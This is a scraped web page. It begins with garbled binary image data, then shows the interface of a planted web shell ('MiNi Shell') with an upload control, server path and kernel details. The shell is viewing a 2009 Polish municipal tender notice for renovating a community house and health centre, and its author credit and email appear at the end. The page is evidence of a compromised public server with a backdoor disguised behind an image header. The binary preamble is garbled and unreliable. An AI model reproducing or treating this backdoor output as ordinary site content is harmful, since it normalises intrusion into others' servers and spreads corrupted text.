JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090326/78128-N-2009.html

<p class="kh_header"><b>Radomyśl nad Sanem: Nadbudowa i przebudowa zmiana sposobu użytkowania   Domu Ludowego  i Ośrodka  Zdrowia  w Rzeczycy Długiej -etap II</b><br>
<b>Numer ogłoszenia: 78128 - 2009; data zamieszczenia: 26.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radomyśl nad Sanem , ul. Rynek Duży 7, 37-455 Radomyśl nad Sanem, woj. podkarpackie, tel. 015 8454328, faks 015 8454302.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadbudowa i przebudowa zmiana sposobu użytkowania   Domu Ludowego  i Ośrodka  Zdrowia  w Rzeczycy Długiej -etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa oraz zmiana sposobu użytkowania I piętra budynku Domu Ludowego    w Rzeczycy Długiej, zmiana konstrukcji dachu i jego pokrycia, częściowe podmurowanie ścian piętra w celu uzyskania dodatkowej powierzchni użytkowej z zachowaniem wysokości kalenicy, docieplenie budynku metodą lekką - mokrą, wewnątrz budynku: niwelacja pochylenia stropu międzypiętrowego  spowodowanego osiadaniem budynku.

A. Przewidywany zakres prac (główne elementy):

a) roboty ziemne:  odkopanie ścian fundamentowych (za wyjątkiem ściany frontowej budynku wykonanej w I etapie robót),
b) zagospodarowanie terenu ( za wyjątkiem chodnika wzdłuż ściany frontowej i dojść do Ośrodka  Zdrowia )
c) izolacje: 		
przeciwwilgociowa: 	
- pionowa ścian fundamentowych ( za wyjątkiem ściany frontowej budynku wykonanej   w I etapie robót ),
-paroizolacja i wstępnego krycia dachu,
-pozioma w pomieszczeniach mokrych,
termiczna: 
-ocieplenie ścian fundamentowych ( za wyjątkiem budynku wykonanej w I etapie robót)
- ocieplenie ścian zewnętrznych,
- ocieplenie dachu                    
c) konstrukcje murowe i żelbetowe:	
-wyburzenia i przebudowa istniejącego układu funkcjonalnego,
-częściowe nadmurowanie ścian kolankowych,
-murowanie przewodów kominowych,
-niwelacja stropu międzypiętrowego,
-wykonanie wieńca na ścianach kolankowych
d) konstrukcja dachu: 
-zmiana konstrukcji dachu,
-pokrycie dachu 
c) roboty wykończeniowe
d) wymiana i rozbudowa wewnętrznej instalacji wodno-kanalizacyjnych,
e) wymiana instalacji centralnego ogrzewania,
f) montaż instalacji elektrycznych.
B. Układ funkcjonalny piętra po przebudowie:

ZESTAWIENIE POMIESZCZEŃ:

Nazwa pomieszczenia:    powierzchnia[ m2]       	wykończenie:
______________________________________________________________
									                                              Posadzki                     Ściany

2/01 Hall		 20,25 m2	płytki ceramiczne	           farba emulsyjna

2/02 Szatnia	 7,41 m2	 	płytki ceramiczne	           farba emulsyjna

2/03 Biblioteka       64,77 m2	płytki ceramiczne	           farba emulsyjna
     z czytelnią 

2/04 Pomieszczenie  8,12m2              płytki ceramiczne          farba emulsyjna
 gospodarcze 

2/05 Korytarz	3,96 m2		płytki ceramiczne	       farba emulsyjna

2/06 WC męski     10,69 m2		płytki ceramiczne	       płytki ceramiczne
2/07 WC damski    9,57 m2		płytki ceramiczne	       płytki ceramiczne

2/08 sala taneczna	 147,99 m2           deski dębowe	       farba emulsyjna

2/09 Rozdzielnia     7,10 m2		płytki ceramiczne          farba emulsyjna

2/10 Pomieszczenie 11,11m2	             płytki ceramiczne	       farba emulsyjna
gospodarcze 1

2/11 zmywalnia 	4,31 m2		płytki ceramiczne	      płytki ceramiczne

2/12 magazyn      4,93 m2		płytki ceramiczne	     farba emulsyjna
		

  RAZEM:          300,21 m2

3.1.W trakcie realizacji należy stosować materiały i wyroby posiadające obowiązujące świadectwa dopuszczenia do stosowania w budownictwie lub jeśli są  przedmiotem Norm Państwowych, zaświadczenia producenta potwierdzające ich zgodność z postanowieniami odpowiednich norm. 

3.2..Wszelkie roboty winny być prowadzone zgodnie ze sztuką budowlaną, przepisami prawa budowlanego, obowiązującymi polskimi normami oraz normami europejskimi, o ile obowiązują w Polsce. Ponadto w trakcie realizacji robót należy stosować się do obowiązujących warunków technicznych wykonania i odbioru robót budowlanych. 

3.3.Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych do wskazanych w dokumentacji projektowej pod warunkiem, że zastosowanie ich nie spowoduje pogorszenia jakości przedmiotu umowy.

3.4. Przedmiot zamówienia określony jest na podstawie posiadanej dokumentacji projektowej zał. nr 5  i specyfikacji technicznych zał. nr 6 , przedmiarów  robót  zał. nr.7
3.5. Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa (zał. nr 5 do SIWZ) oraz specyfikacje techniczne wykonania i odbioru robót budowlanych zawierająca zbiory wymagań w zakresie sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót ( zał. nr 6). Wszelkie prace na obiekcie należy wykonać zgodnie z dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót.
3.6. Zestawienie robót planowanych do wykonania w ramach w/w zamówienia podane jest przedmiarach robót (zał. nr 7 do SIWZ), stanowiących materiał pomocniczy i informacyjny do sporządzenia wyceny.
3.7. W ramach realizacji zamówienia należy wykonać również:
- wszelkie prace pomocnicze i towarzyszące, które są konieczne do prawidłowego wykonania robót  ujętych w przedmiarze robót, w tym prace wynikające ze specyfikacji technicznej  i dokumentacji projektowej,
- wszelkie inne roboty, prace, badania, czynności, obowiązki i wymogi wynikające z SIWZ  (specyfikacji technicznych, dokumentacji projektowej, przedmiarów robót 
- inwentaryzację geodezyjną powykonawczą.
3.8. Wykonawca zobowiązany jest do dokonania wizji lokalnej na terenie budowy oraz do zdobycia wszelkich koniecznych informacji, niezbędnych do przygotowania oferty.
3.9. Wykonawca jest zobowiązany do ponoszenia odpowiedzialności za szkody oraz następstwa nieszczęśliwych wypadków dotyczących pracowników i osób trzecich, a powstałych w związku  z prowadzonymi robotami. W tym celu wskazane jest, aby Wykonawca ubezpieczył prowadzoną budowę od odpowiedzialności cywilnej, zabezpieczył i oznakował plac budowy.
3.10. Uwaga: 
1) istniejące pokrycie dachu - eternit, demontaż, usuwanie i wywóz odpadów zgodnie z obowiązującymi przepisami prawa. 
2)  kolorystyka: tynki zewnętrzne: kolor zg. z  rys. K14, K.15 
3)  pokrycie dachu : blacha stalowa dachówkopodobna, kolor: zg. z rys.K14, K15 
4)  kolorystyka ścian wewnętrznych - kolory jasne, pastelowe
5)  szyby w oknach zwykłe zamiast szyb typu Antisol,
6) Zamawiający posiada nowe okna  o wymiarach 150 x 175 - w ilości 2 szt., przeznaczone do montażu na I piętrze. 
7) Wentylacja mechaniczna została wykonana w I etapie.

3.11. Wykonawca jest zobowiązany prowadzić wszelkie prace w sposób niezakłócający funkcjonowania pozostałej części budynku (Ośrodek Zdrowia), organizację  i zabezpieczenie placu budowy oraz prowadzenie prac budowlanych w sposób umożliwiający pacjentom bezpieczne dojście do Ośrodka Zdrowia i korzystanie z jego usług..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.22.30.00-6, 45.26.12.10-9, 45.30.00.00-0, 45.33.00.00-9, 45.33.24.00-7, 45.33.11.00-7, 45.31.11.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału w postępowaniu - art. 44  i  określone przepisami art. 22 ust.1 pkt 1-4 :
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - (Wykonawca winien wykazać, że dysponuje lub przedstawić pisemne zobowiązanie do udostępnienia osób zdolnych do wykonania zamówienia-   które  posiadającą uprawnienia do  wykonywania samodzielnych funkcji technicznych w budownictwie: o specjalności konstrukcyjno-budowlanej, branży sanitarnej  i branży elektrycznej), co należy udokumentować poprzez złożenie poświadczonych za zgodność  z oryginałem kopii odpowiednich uprawnień oraz zaświadczeń potwierdzających przynależność do właściwych izb samorządu zawodowego oraz pisemne zobowiązanie ( jeżeli dotyczy) .
c)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia  na podstawie     art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych
d)spełniają wymagania określone ustawą Pzp oraz niniejszą specyfikacją.

2. Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte  w dokumentach wymaganych przez Zamawiającego na potwierdzenie spełnienia warunków udziału w postępowaniu. Wykaz oświadczeń lub dokumentów, na podstawie których zostanie dokonana ocena spełnienia warunków udziału w postępowaniu, zawiera rozdział VIII SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art.24 ustawy Wykonawca zobowiązany jest do złożenia następujących dokumentów:
a)oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, - art. 44,  oraz warunków ubiegania się o udzielenie zamówienia - art. 22 ust.1 pkt 1-4 i nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy prawo zamówień publicznych, 
b)aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert,
c)aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego, potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
d)aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e)aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
f)aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt.9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia, to właściwe dokumenty wymienione w pkt 1 lit. a-f muszą być złożone przez każdy podmiot osobno.

Dokumenty o których mowa w pkt 1 lit. b-f mogą być przedstawione w formie kopii, poświadczonej za zgodność z oryginałem przez Wykonawcę.

2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w pkt.1 lit. b-f składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

A. nie otwarto jego likwidacji ani nie ogłoszono upadłości,
B. nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne   i zdrowotne, albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
C. nie orzeczono wobec niego zakazu ubiegania się o zamówienie.

Dokumenty o których mowa powyżej w pkt 2. lit. A i C powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Dokumenty o których mowa w pkt 2 lit. B powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu ofert 
Dokumenty o których mowa w pkt 2 lit. A -C mogą być przedstawione w formie kopii, poświadczonej za zgodność z oryginałem przez Wykonawcę. 

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt.2 lit. A-C Wykonawca zastępuje te dokumenty - dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Dokument o którym mowa powyżej powinien być złożony w oryginale.
Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.

3. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:

a)wykazu osób (osoby posiadające uprawnienia do  wykonywania samodzielnych funkcji technicznych w budownictwie: o specjalności konstrukcyjno-budowlanej, branży sanitarnej  i branży elektrycznej), którymi dysponuje  lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz   z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności
b)dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (poświadczone za zgodność z oryginałem kopie odpowiednich uprawnień oraz zaświadczeń potwierdzających przynależność do właściwych izb samorządu zawodowego),
c)pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym w ppkt (a) Wykonawca wskazał osoby, którymi będzie dysponował.
4. Warunki dotyczące powierzenia części robót Podwykonawcom.

a) Wykonawca, który zamierza realizować przedmiot zamówienia przy udziale Podwykonawców, zobowiązany jest wyraźnie wskazać w swojej ofercie część zamówienia, której wykonanie zamierza powierzyć Podwykonawcom. 
b) Wykonawca, który wskaże w ofercie część zamówienia, której wykonanie zamierza powierzyć Podwykonawcom, w przypadku uznania jego oferty za najkorzystniejszą, będzie zobowiązany przed podpisaniem umowy z Zamawiającym przedłożyć umowę regulującą współpracę z Podwykonawcami..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.radomysl.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> za wersję papierową SIWZ należy uiścić opłatę na rachunek bankowy Zamawiającego: BS w Zaleszanach o. Radomyśl n. S. nr 53 9439 1017 2001 0000 0882 0001
Opłata za SIWZ - 40,00 zł brutto + koszty wysył.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 10:00, miejsce: Urząd Gminy w Radomyślu nad Sanem, ul. Rynek Duży 7, 37-455 Radomyśl nad Sanem, 
sekretariat urzędu - pok. nr 13.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 15.05.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com